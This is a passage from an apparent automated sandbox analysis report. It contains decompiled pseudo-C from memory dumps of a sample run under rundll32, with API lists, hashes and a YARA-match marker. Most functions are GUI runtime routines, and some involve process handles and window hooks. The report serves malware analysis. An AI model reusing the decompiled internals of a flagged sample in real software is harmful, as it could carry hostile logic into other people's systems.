                          					return _t33;
                          				} else {
                          					E00E30B08(_v8);
                          					_push(_t87);
                          					_push(0xe33f73);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t89;
                          					E00E3529C( *((intOrPtr*)(_v8 + 0x58)));
                          					E00E33D10( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                          					E00E3539C( *((intOrPtr*)(_v8 + 0x58)));
                          					_t69 = CreateCompatibleDC(0);
                          					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                          					if(_t84 == 0) {
                          						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                          					} else {
                          						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
                          					}
                          					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
                          					if(_t85 == 0) {
                          						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                          					} else {
                          						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
                          						RealizePalette(_t69);
                          					}
                          					E00E30DFC(_v8, _t69);
                          					_t59 =  *0xe7c6ec; // 0xf00acc
                          					E00E27360(_t59, _t69, _t70, _v8, _t85);
                          					_pop(_t79);
                          					 *[fs:eax] = _t79;
                          					_push(0xe33f7a);
                          					return E00E30C74(_v8);
                          				}
                          			}


                          APIs
                            • Part of subcall function 00E30B08: RtlEnterCriticalSection.KERNEL32(00E7F8C8,00000000,00E2F5B6,00000000,00E2F615), ref: 00E30B10
                            • Part of subcall function 00E30B08: RtlLeaveCriticalSection.KERNEL32(00E7F8C8,00E7F8C8,00000000,00E2F5B6,00000000,00E2F615), ref: 00E30B1D
                            • Part of subcall function 00E30B08: RtlEnterCriticalSection.KERNEL32(00000038,00E7F8C8,00E7F8C8,00000000,00E2F5B6,00000000,00E2F615), ref: 00E30B26
                            • Part of subcall function 00E3539C: GetDC.USER32(00000000), ref: 00E353F2
                            • Part of subcall function 00E3539C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E35407
                            • Part of subcall function 00E3539C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00E35411
                            • Part of subcall function 00E3539C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00E33EE7,00000000,00E33F73), ref: 00E35435
                            • Part of subcall function 00E3539C: ReleaseDC.USER32 ref: 00E35440
                          • CreateCompatibleDC.GDI32(00000000), ref: 00E33EE9
                          • SelectObject.GDI32(00000000,?), ref: 00E33F02
                          • SelectPalette.GDI32(00000000,?,000000FF), ref: 00E33F2B
                          • RealizePalette.GDI32(00000000), ref: 00E33F37
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                          • String ID:
                          • API String ID: 979337279-0
                          • Opcode ID: c01c23f62119850451a5c6d1e47b1fe66fad7619ebd59051d20ae6853e460b57
                          • Instruction ID: 3ca486319556088df57c240f083ee49160025cd0e8bc114abf8f0c5334b19365
                          • Opcode Fuzzy Hash: c01c23f62119850451a5c6d1e47b1fe66fad7619ebd59051d20ae6853e460b57
                          • Instruction Fuzzy Hash: 1231F774A04658EFD704EF69C985D8EBBF5EF48720B6255A5F804AB322D730EE80DB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E50AEC(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                          				intOrPtr _v8;
                          				void* __ecx;
                          				void* __edi;
                          				int _t27;
                          				void* _t40;
                          				int _t41;
                          				int _t50;
                          
                          				_t50 = _t41;
                          				_t49 = __edx;
                          				_t40 = __eax;
                          				if(E00E501F8(__eax) == 0) {
                          					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                          				}
                          				_v8 = 0;
                          				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                          					_t27 = GetMenuItemID(_t49, _t50);
                          					_t51 = _t27;
                          					if(_t27 != 0xffffffff) {
                          						_v8 = E00E50074(_t40, 0, _t51);
                          					}
                          				} else {
                          					_t49 = GetSubMenu(_t49, _t50);
                          					_v8 = E00E50074(_t40, 1, _t37);
                          				}
                          				if(_v8 == 0) {
                          					return 0;
                          				} else {
                          					 *_a12 = 0;
                          					E00E18A44(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                          					return E00E18988(_a12, _t49);
                          				}
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$ItemStateString
                          • String ID:
                          • API String ID: 306270399-0
                          • Opcode ID: 43d8460374a5e68e0b4c43e8129ce4c9323bb60f161401557c61158e3e4aae79
                          • Instruction ID: df122e1553949f3e3a6de7af44fc3ff45e4191c0ef7548a7fd198ff534531ce3
                          • Opcode Fuzzy Hash: 43d8460374a5e68e0b4c43e8129ce4c9323bb60f161401557c61158e3e4aae79
                          • Instruction Fuzzy Hash: CB118E31601218AF8B80EE2CCCC1EEF77E89F8A365B146929FC19EB351CA309D45D760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00E2DDA4(intOrPtr _a4, short _a6, intOrPtr _a8) {
                          				struct _WNDCLASSA _v44;
                          				struct HINSTANCE__* _t6;
                          				CHAR* _t8;
                          				struct HINSTANCE__* _t9;
                          				int _t10;
                          				void* _t11;
                          				struct HINSTANCE__* _t13;
                          				struct HINSTANCE__* _t19;
                          				CHAR* _t20;
                          				struct HWND__* _t22;
                          				CHAR* _t24;
                          
                          				_t6 =  *0xe7f668; // 0xe10000
                          				 *0xe7c41c = _t6;
                          				_t8 =  *0xe7c430; // 0xe2dd94
                          				_t9 =  *0xe7f668; // 0xe10000
                          				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                          				asm("sbb eax, eax");
                          				_t11 = _t10 + 1;
                          				if(_t11 == 0 || L00E167F0 != _v44.lpfnWndProc) {
                          					if(_t11 != 0) {
                          						_t19 =  *0xe7f668; // 0xe10000
                          						_t20 =  *0xe7c430; // 0xe2dd94
                          						UnregisterClassA(_t20, _t19);
                          					}
                          					RegisterClassA(0xe7c40c);
                          				}
                          				_t13 =  *0xe7f668; // 0xe10000
                          				_t24 =  *0xe7c430; // 0xe2dd94
                          				_t22 = E00E16D14(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                          				if(_a6 != 0) {
                          					SetWindowLongA(_t22, 0xfffffffc, E00E2DCE8(_a4, _a8));
                          				}
                          				return _t22;
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Class$InfoLongRegisterUnregisterWindow
                          • String ID:
                          • API String ID: 4025006896-0
                          • Opcode ID: 26713a71879fc5a42e83cc98e1900c446833518a9d621d4a1a28ef0a6065e20d
                          • Instruction ID: 70255f61fa81a14cdb01baeb10225839cc87d5f7e2aae7032736d9e6cf8c591f
                          • Opcode Fuzzy Hash: 26713a71879fc5a42e83cc98e1900c446833518a9d621d4a1a28ef0a6065e20d
                          • Instruction Fuzzy Hash: FD018471644204AFCB10EBA9EC91FAA33ACFB58308F105224F618F72A1D671D8C9C7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E00E29850(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                          				CHAR* _v8;
                          				void* __ebx;
                          				void* __ecx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t18;
                          				void* _t23;
                          				CHAR* _t24;
                          				void* _t25;
                          				struct HRSRC__* _t29;
                          				void* _t30;
                          				struct HINSTANCE__* _t31;
                          				void* _t32;
                          
                          				_v8 = _t24;
                          				_t31 = __edx;
                          				_t23 = __eax;
                          				_t29 = FindResourceA(__edx, _v8, _a4);
                          				 *(_t23 + 0x10) = _t29;
                          				_t33 = _t29;
                          				if(_t29 == 0) {
                          					E00E297E0(_t23, _t24, _t29, _t31, _t33, _t32);
                          					_pop(_t24);
                          				}
                          				_t5 = _t23 + 0x10; // 0xe298f4
                          				_t30 = LoadResource(_t31,  *_t5);
                          				 *(_t23 + 0x14) = _t30;
                          				_t34 = _t30;
                          				if(_t30 == 0) {
                          					E00E297E0(_t23, _t24, _t30, _t31, _t34, _t32);
                          				}
                          				_t7 = _t23 + 0x10; // 0xe298f4
                          				_push(SizeofResource(_t31,  *_t7));
                          				_t8 = _t23 + 0x14; // 0xe29568
                          				_t18 = LockResource( *_t8);
                          				_pop(_t25);
                          				return E00E29528(_t23, _t25, _t18);
                          			}

                          APIs
                          • FindResourceA.KERNEL32(00E10000,?,?), ref: 00E29867
                          • LoadResource.KERNEL32(00E10000,00E298F4,00E254E8,00E10000,00000001,?,?,00E297C1,?,?,?,?,?,00E7BB73,0000000A,0000001F), ref: 00E29881
                          • SizeofResource.KERNEL32(00E10000,00E298F4,00E10000,00E298F4,00E254E8,00E10000,00000001,?,?,00E297C1,?,?,?,?,?,00E7BB73), ref: 00E2989B
                          • LockResource.KERNEL32(00E29568,00000000,00E10000,00E298F4,00E10000,00E298F4,00E254E8,00E10000,00000001,?,?,00E297C1,?), ref: 00E298A5
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3473537107-0
                          • Opcode ID: 8cd8de71b59c484ff7f639ff1c74d5e670da148cea41797eeb8666ebfbaf92ad
                          • Instruction ID: 677cef858ca01ff89de1175e401e207c021030fd169772c093e2919b50106230
                          • Opcode Fuzzy Hash: 8cd8de71b59c484ff7f639ff1c74d5e670da148cea41797eeb8666ebfbaf92ad
                          • Instruction Fuzzy Hash: 45F081B36042146F5708EEACB881D9B77ECEE893A0710246AF91CE7307DA30DD014374
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01081DDF() {
                          				void* _t1;
                          				long _t3;
                          				void* _t4;
                          				long _t5;
                          				void* _t6;
                          				intOrPtr _t8;
                          				void* _t12;
                          
                          				_t8 =  *0x10841b0;
                          				_t1 = CreateEventA(0, 1, 0, 0);
                          				 *0x10841bc = _t1;
                          				if(_t1 == 0) {
                          					return GetLastError();
                          				}
                          				_t3 = GetVersion();
                          				if(_t3 != 5) {
                          					L4:
                          					if(_t12 <= 0) {
                          						_t4 = 0x32;
                          						return _t4;
                          					} else {
                          						goto L5;
                          					}
                          				} else {
                          					if(_t3 > 0) {
                          						L5:
                          						 *0x10841ac = _t3;
                          						_t5 = GetCurrentProcessId();
                          						 *0x10841a8 = _t5;
                          						 *0x10841b0 = _t8;
                          						_t6 = OpenProcess(0x10047a, 0, _t5);
                          						 *0x10841a4 = _t6;
                          						if(_t6 == 0) {
                          							 *0x10841a4 =  *0x10841a4 | 0xffffffff;
                          						}
                          						return 0;
                          					} else {
                          						_t12 = _t3 - _t3;
                          						goto L4;
                          					}
                          				}
                          			}

                          APIs
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,010814C5), ref: 01081DEE
                          • GetVersion.KERNEL32 ref: 01081DFD
                          • GetCurrentProcessId.KERNEL32 ref: 01081E14
                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01081E2D
                          Memory Dump Source
                          • Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                          • Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CreateCurrentEventOpenVersion
                          • String ID:
                          • API String ID: 845504543-0
                          • Opcode ID: ec0c3d6738ec2a517a0b665241196ff427a802c2334894fd7b851521ac1a0bee
                          • Instruction ID: bfd38d09ec40802adff1a1ba2955eec90bb8c321845d2abafa0ff9452bc3692e
                          • Opcode Fuzzy Hash: ec0c3d6738ec2a517a0b665241196ff427a802c2334894fd7b851521ac1a0bee
                          • Instruction Fuzzy Hash: 4DF03C3068D3219EEBB09B6CBC0A78D3BA0FB55B21F040055F2C1DA1C8E3BA84428F59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00E5380C(struct HWND__* __eax, void* __ecx) {
                          				intOrPtr _t5;
                          				struct HWND__* _t12;
                          				void* _t15;
                          				DWORD* _t16;
                          
                          				_t13 = __ecx;
                          				_push(__ecx);
                          				_t12 = __eax;
                          				_t15 = 0;
                          				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
                          					_t5 =  *0xe7fb6c; // 0xf013d0
                          					if(GlobalFindAtomA(E00E14528(_t5)) !=  *0xe7fb66) {
                          						_t15 = E00E537D8(_t12, _t13);
                          					} else {
                          						_t15 = GetPropA(_t12,  *0xe7fb66 & 0x0000ffff);
                          					}
                          				}
                          				return _t15;
                          			}

                          APIs
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00E53819
                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,00E551BF,?,?,00000000,00000001,00E551EC), ref: 00E53822
                          • GlobalFindAtomA.KERNEL32 ref: 00E53837
                          • GetPropA.USER32 ref: 00E5384E
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                          • String ID:
                          • API String ID: 2582817389-0
                          • Opcode ID: ca5b64a2cbf957e64cf849c0c717a078303942ffe36f1a70c1656d954fade79c
                          • Instruction ID: ed2f7f339223a6016b80f69f50e5482d46fc80c2224285904d9fbfe57492adc9
                          • Opcode Fuzzy Hash: ca5b64a2cbf957e64cf849c0c717a078303942ffe36f1a70c1656d954fade79c
                          • Instruction Fuzzy Hash: EFF030F1704114AA8628B7BAAC818AB62DC9A147D63116D31FD45FA246D520CD8883B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E4714C(void* __ecx) {
                          				void* _t2;
                          				DWORD* _t7;
                          
                          				_t2 =  *0xe7fb1c; // 0xf0184c
                          				if( *((char*)(_t2 + 0xa5)) == 0) {
                          					if( *0xe7fb34 == 0) {
                          						_t2 = SetWindowsHookExA(3, 0xe47108, 0, GetCurrentThreadId());
                          						 *0xe7fb34 = _t2;
                          					}
                          					if( *0xe7fb30 == 0) {
                          						_t2 = CreateEventA(0, 0, 0, 0);
                          						 *0xe7fb30 = _t2;
                          					}
                          					if( *0xe7fb38 == 0) {
                          						_t2 = CreateThread(0, 0x3e8,  &M00E470AC, 0, 0, _t7);
                          						 *0xe7fb38 = _t2;
                          					}
                          				}
                          				return _t2;
                          			}

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00E47164
                          • SetWindowsHookExA.USER32 ref: 00E47174
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00E49951,?,?,00F0184C,00000000,?,00E492F8), ref: 00E4718F
                          • CreateThread.KERNEL32 ref: 00E471B3
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CreateThread$CurrentEventHookWindows
                          • String ID:
                          • API String ID: 1195359707-0
                          • Opcode ID: e982df4ad3b8be18cf26c58b9c74d22a5a0a8b6ea282749cc31c044a6a5f3809
                          • Instruction ID: b1aa26ea9a82ba6b9f465203ea4e5bad0d598b720f59e31230c80eafd6f93edd
                          • Opcode Fuzzy Hash: e982df4ad3b8be18cf26c58b9c74d22a5a0a8b6ea282749cc31c044a6a5f3809
                          • Instruction Fuzzy Hash: 5AF0FEF06CA300BEF720EB61ECA7F593694EB51B1AF112035F5887A1D1CBB054C98655
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			E00E2FF38(void* __eax, void* __ebx, void* __ecx) {
                          				signed int _v8;
                          				struct tagLOGFONTA _v68;
                          				char _v72;
                          				char _v76;
                          				char _v80;
                          				intOrPtr _t76;
                          				intOrPtr _t81;
                          				void* _t100;
                          				void* _t107;
                          				void* _t116;
                          				intOrPtr _t126;
                          				void* _t137;
                          				void* _t138;
                          				intOrPtr _t139;
                          
                          				_t137 = _t138;
                          				_t139 = _t138 + 0xffffffb4;
                          				_v80 = 0;
                          				_v76 = 0;
                          				_v72 = 0;
                          				_t116 = __eax;
                          				_push(_t137);
                          				_push(0xe300c1);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t139;
                          				_v8 =  *((intOrPtr*)(__eax + 0x10));
                          				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                          					__eflags = 0;
                          					 *[fs:eax] = 0;
                          					_push(0xe300c8);
                          					return E00E1408C( &_v80, 3);
                          				} else {
                          					_t76 =  *0xe7f8e0; // 0xf00a30
                          					E00E2F27C(_t76);
                          					_push(_t137);
                          					_push(0xe30099);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t139;
                          					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                          						_v68.lfHeight =  *(_v8 + 0x14);
                          						_v68.lfWidth = 0;
                          						_v68.lfEscapement = 0;
                          						_v68.lfOrientation = 0;
                          						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                          							_v68.lfWeight = 0x190;
                          						} else {
                          							_v68.lfWeight = 0x2bc;
                          						}
                          						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                          						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                          						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                          						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                          						E00E142CC( &_v72, _v8 + 0x1b,  *(_v8 + 0x19) & 0x00000008);
                          						_t100 = E00E18000(_v72, "Default");
                          						_t146 = _t100;
                          						if(_t100 != 0) {
                          							__eflags = _v8 + 0x1b;
                          							E00E142CC( &_v80, _v8 + 0x1b, _v8 + 0x1b);
                          							E00E18A20( &(_v68.lfFaceName), _v80);
                          						} else {
                          							E00E142CC( &_v76, "\rMS Sans Serif", _t146);
                          							E00E18A20( &(_v68.lfFaceName), _v76);
                          						}
                          						_v68.lfQuality = 0;
                          						_v68.lfOutPrecision = 0;
                          						_v68.lfClipPrecision = 0;
                          						_t107 = E00E3021C(_t116) - 1;
                          						if(_t107 == 0) {
                          							_v68.lfPitchAndFamily = 2;
                          						} else {
                          							if(_t107 == 1) {
                          								_v68.lfPitchAndFamily = 1;
                          							} else {
                          								_v68.lfPitchAndFamily = 0;
                          							}
                          						}
                          						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                          					}
                          					_pop(_t126);
                          					 *[fs:eax] = _t126;
                          					_push(0xe300a0);
                          					_t81 =  *0xe7f8e0; // 0xf00a30
                          					return E00E2F288(_t81);
                          				}
                          			}

                          0x00e2ff39
                          0x00e2ff3b
                          0x00e2ff41
                          0x00e2ff44
                          0x00e2ff47
                          0x00e2ff4a
                          0x00e2ff4e
                          0x00e2ff4f
                          0x00e2ff54
                          0x00e2ff57
                          0x00e2ff5d
                          0x00e2ff67
                          0x00e300a6
                          0x00e300ab
                          0x00e300ae
                          0x00e300c0
                          0x00e2ff6d
                          0x00e2ff6d
                          0x00e2ff72
                          0x00e2ff79
                          0x00e2ff7a
                          0x00e2ff7f
                          0x00e2ff82
                          0x00e2ff8c
                          0x00e2ff98
                          0x00e2ff9d
                          0x00e2ffa2
                          0x00e2ffa7
                          0x00e2ffb1
                          0x00e2ffbc
                          0x00e2ffb3
                          0x00e2ffb3
                          0x00e2ffb3
                          0x00e2ffcd
                          0x00e2ffda
                          0x00e2ffe7
                          0x00e2fff0
                          0x00e2fffc
                          0x00e30009
                          0x00e3000e
                          0x00e30010
                          0x00e30032
                          0x00e30035
                          0x00e30040
                          0x00e30012
                          0x00e3001a
                          0x00e30025
                          0x00e30025
                          0x00e30045
                          0x00e30049
                          0x00e3004d
                          0x00e30058
                          0x00e3005a
                          0x00e30062
                          0x00e3005c
                          0x00e3005e
                          0x00e30068
                          0x00e30060
                          0x00e3006e
                          0x00e3006e
                          0x00e3005e
                          0x00e3007e
                          0x00e3007e
                          0x00e30083
                          0x00e30086
                          0x00e30089
                          0x00e3008e
                          0x00e30098
                          0x00e30098

                          APIs
                            • Part of subcall function 00E2F27C: RtlEnterCriticalSection.KERNEL32(?,00E2F2B9), ref: 00E2F280
                          • CreateFontIndirectA.GDI32(?), ref: 00E30076
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CreateCriticalEnterFontIndirectSection
                          • String ID: MS Sans Serif$Default
                          • API String ID: 2931345757-2137701257
                          • Opcode ID: 6b43d5931a23370d723dc5a005e6b84abee11827b876587c42e037e0cbabb5c7
                          • Instruction ID: ed74136b04d310177409274b2585bd6abdaae2cd46d1a4853f5403e132dc3f7a
                          • Opcode Fuzzy Hash: 6b43d5931a23370d723dc5a005e6b84abee11827b876587c42e037e0cbabb5c7
                          • Instruction Fuzzy Hash: BF517530A08248DFDB05CFA8C595BCDBBF6AF49304F6594A9E800B7362D3749E84DB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E00E1BD60(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                          				char _v8;
                          				struct _MEMORY_BASIC_INFORMATION _v36;
                          				char _v297;
                          				char _v304;
                          				intOrPtr _v308;
                          				char _v312;
                          				char _v316;
                          				char _v320;
                          				intOrPtr _v324;
                          				char _v328;
                          				void* _v332;
                          				char _v336;
                          				char _v340;
                          				char _v344;
                          				char _v348;
                          				intOrPtr _v352;
                          				char _v356;
                          				char _v360;
                          				char _v364;
                          				void* _v368;
                          				char _v372;
                          				intOrPtr _t52;
                          				intOrPtr _t60;
                          				intOrPtr _t82;
                          				intOrPtr _t86;
                          				intOrPtr _t89;
                          				intOrPtr _t101;
                          				void* _t108;
                          				intOrPtr _t110;
                          				void* _t113;
                          
                          				_t108 = __edi;
                          				_v372 = 0;
                          				_v336 = 0;
                          				_v344 = 0;
                          				_v340 = 0;
                          				_v8 = 0;
                          				_push(_t113);
                          				_push(0xe1bf1b);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t113 + 0xfffffe90;
                          				_t89 =  *((intOrPtr*)(_a4 - 4));
                          				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                          					_t52 =  *0xe7e13c; // 0xe16fe4
                          					E00E15E1C(_t52,  &_v8);
                          				} else {
                          					_t86 =  *0xe7e31c; // 0xe16fdc
                          					E00E15E1C(_t86,  &_v8);
                          				}
                          				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                          				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                          				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                          					_v368 =  *(_t89 + 0xc);
                          					_v364 = 5;
                          					_v360 = _v8;
                          					_v356 = 0xb;
                          					_v352 = _t110;
                          					_v348 = 5;
                          					_t60 =  *0xe7e150; // 0xe16f8c
                          					E00E15E1C(_t60,  &_v372);
                          					E00E1B940(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                          				} else {
                          					_v332 =  *(_t89 + 0xc);
                          					_v328 = 5;
                          					E00E142D8( &_v340, 0x105,  &_v297);
                          					E00E18858(_v340,  &_v336);
                          					_v324 = _v336;
                          					_v320 = 0xb;
                          					_v316 = _v8;
                          					_v312 = 0xb;
                          					_v308 = _t110;
                          					_v304 = 5;
                          					_t82 =  *0xe7e1e0; // 0xe17084
                          					E00E15E1C(_t82,  &_v344);
                          					E00E1B940(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                          				}
                          				_pop(_t101);
                          				 *[fs:eax] = _t101;
                          				_push(0xe1bf22);
                          				E00E14068( &_v372);
                          				E00E1408C( &_v344, 3);
                          				return E00E14068( &_v8);
                          			}

                          0x00e1bd60
                          0x00e1bd6d
                          0x00e1bd73
                          0x00e1bd79
                          0x00e1bd7f
                          0x00e1bd85
                          0x00e1bd8a
                          0x00e1bd8b
                          0x00e1bd90
                          0x00e1bd93
                          0x00e1bd99
                          0x00e1bda0
                          0x00e1bdb4
                          0x00e1bdb9
                          0x00e1bda2
                          0x00e1bda5
                          0x00e1bdaa
                          0x00e1bdaa
                          0x00e1bdbe
                          0x00e1bdcb
                          0x00e1bdd7
                          0x00e1be93
                          0x00e1be99
                          0x00e1bea3
                          0x00e1bea9
                          0x00e1beb0
                          0x00e1beb6
                          0x00e1becc
                          0x00e1bed1
                          0x00e1bee3
                          0x00e1bdfa
                          0x00e1bdfd
                          0x00e1be03
                          0x00e1be1b
                          0x00e1be2c
                          0x00e1be37
                          0x00e1be3d
                          0x00e1be47
                          0x00e1be4d
                          0x00e1be54
                          0x00e1be5a
                          0x00e1be70
                          0x00e1be75
                          0x00e1be87
                          0x00e1be8c
                          0x00e1beec
                          0x00e1beef
                          0x00e1bef2
                          0x00e1befd
                          0x00e1bf0d
                          0x00e1bf1a

                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00E1BF1B), ref: 00E1BDCB
                          • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00E1BF1B), ref: 00E1BDED
                            • Part of subcall function 00E15E1C: LoadStringA.USER32 ref: 00E15E4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: FileLoadModuleNameQueryStringVirtual
                          • String ID: o
                          • API String ID: 902310565-2084137227
